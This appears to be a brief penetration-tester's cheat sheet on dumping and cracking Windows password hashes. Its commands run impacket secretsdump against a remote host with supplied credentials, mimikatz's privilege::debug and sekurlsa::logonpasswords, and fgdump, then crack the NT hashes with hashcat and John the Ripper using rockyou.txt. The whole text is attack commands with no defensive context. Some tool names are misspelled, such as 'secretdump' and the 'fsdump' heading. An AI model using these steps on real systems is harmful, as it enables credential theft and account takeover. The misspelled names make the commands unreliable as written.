Password Hash Dumping

*Using Impacket-secretdump

impacket-secretdump “<domain>/<user>:<password>@<ip>”

*Using mimikatz

1) Transfer all 3 mimikatz file to run mimikatz.exe from /usr/share/windows-resources/mimikatz/

mimikatz.exe

2) Give privilege access

privilege::debug

3) sekurlsa::logonpasswords

retrieve password hash

• If somehow mimikatz don’t work.. try in single command
  .
  /mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit”

*Using fsdump

• transfer from usr/share/windows-resources/binaries/fgdump/fgdump.exe

• fgdump.exe

• 127.0.0.1.pwdump will have all hashes

Crack

• hashcat -m 1000 hash rockyou.txt

• john –format=nt hash –wordlist=rockyou.txt